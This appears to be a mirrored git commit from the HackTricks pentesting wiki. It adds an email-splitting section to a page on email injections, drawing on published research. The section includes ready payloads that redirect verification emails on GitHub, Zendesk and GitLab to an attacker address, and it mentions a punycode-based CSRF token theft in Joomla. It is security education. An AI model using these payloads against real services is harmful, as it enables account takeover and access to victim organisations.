Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 21:24:06 +00:00
Code Issues Projects Releases Packages Wiki Activity

GITBOOK-4384: No subject

Browse source
This commit is contained in:
CPol 2024-08-19 15:43:51 +00:00 committed by gitbook-bot
parent 144069a83c
commit 2ed24193bb
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
3 changed files with 71 additions and 42 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

1
SUMMARY.md
View file

@ -840,7 +840,6 @@
* [Burp Suite](todo/burp-suite.md)
* [Other Web Tricks](todo/other-web-tricks.md)
* [Interesting HTTP](todo/interesting-http.md)
* [Emails Vulnerabilities](todo/emails-vulns.md)
* [Android Forensics](todo/android-forensics.md)
* [TR-069](todo/tr-069.md)
* [6881/udp - Pentesting BitTorrent](todo/6881-udp-pentesting-bittorrent.md)

77
pentesting-web/email-injections.md
View file

@ -3,14 +3,14 @@
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
@ -97,6 +97,10 @@ Depending on the **origin of the sendmail** binary different options have been d
## Inject in the e-mail name
{% hint style="danger" %}
Note that if you manage to create an account in a service with an arbitrary domain name (like Github, Gitlab, CloudFlare Zero trust...) and verify it receiving the verification email in your mail address, you might be able to access sensitive locations of the victim company
{% endhint %}
### Ignored parts of an email
The symbols: **+, -** and **{}** in rare occasions can be used for tagging and ignored by most e-mail servers
@ -122,6 +126,67 @@ You can also use IPs as domain named between square brackets:
* john.doe@\[127.0.0.1]
* john.doe@\[IPv6:2001:db8::1]
### Email Encoding
As explained in [**this research**](https://portswigger.net/research/splitting-the-email-atom), email names also can also contain encoded characters:
* **PHP 256 overflow**: PHP `chr` function will continue adding 256 to a char until it becames positive and then do the operation `%256`.
* `String.fromCodePoint(0x10000 + 0x40) // 𐁀 → @`
{% hint style="success" %}
The goal of this trick is to end with an injection like `RCPT TO:<"collab@psres.net>collab"@example.com>`\
that will send the verification email to a different email address from the expected one (therefore to introduce another email address inside the email name and break the syntax when sending the email)
{% endhint %}
Different encodings:
```bash
# Format
=? utf-8 ? q ? =41=42=43 ?= hi@example.com --> ABChi@example.com
# =? -> Start of encode
# utf-8 -> encoding used
# ? -> separator
# q -> type of encoding
# ? -> separator
# =41=42=43 -> Hex encoded data
# ?= end of encoding
# Other encodings, same example:
# iso-8859-1
=?iso-8859-1?q?=61=62=63?=hi@example.com
# utf-8
=?utf-8?q?=61=62=63?=hi@example.com
# utf-7
=?utf-7?q?<utf-7 encoded string>?=hi@example.com
# q encoding + utf-7
=?utf-7?q?&=41<utf-7 encoded string without initial A>?=hi@example.com
# base64
=?utf-8?b?QUJD?=hi@example.com
# bas64 + utf-7
=?utf-7?q?<utf-7 encoded string in base64>?=hi@example.com
#punycode
x@xn--svg/-9x6 → x@<svg/
```
Payloads:
* Github: `=?x?q?collab=40psres.net=3e=00?=foo@example.com`
* Note the encoded `@` as =40, the encoded `>` as `=3e` and `null` as `=00`&#x20;
* It'll send the verification email to `collab@psres.net`
* Zendesk: `"=?x?q?collab=22=40psres.net=3e=00==3c22x?="@example.com`
* Same trick as before but adding some regular quote at the beginning and encoded qoute `=22` before the encoded `@` and then starting and close some qoutes before the next email to fix the syntax used internally by Zendesk
* It'll send the verification email to `collab@psres.net`
* Gitlab: `=?x?q?collab=40psres.net_?=foo@example.com`
* Note the use of the underscore as a space to separate address
* It'll send the verification email to `collab@psres.net`
* Punycode: Using Punycode it was possible to inject a tag `<style` in Joomla and abuse it to steal the CSRF token via CSS exfiltration.
#### Tooling
* There is a **Burp Suite Turbo Intruder script** to fuzz these kind of combinations to try to attack email formats. The script already have potentially working combinations.
* It's laso possible to use [Hackvertor](https://portswigger.net/bappstore/65033cbd2c344fbabe57ac060b5dd100) to create an email splitting attack
### Other vulns
![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (1131).png>)
@ -161,8 +226,8 @@ For more detailed information, AWS's official documentation on handling bounces
* [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
@ -178,7 +243,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}

35
todo/emails-vulns.md
View file

@ -1,35 +0,0 @@
# Emails Vulnerabilities
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
##
##
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}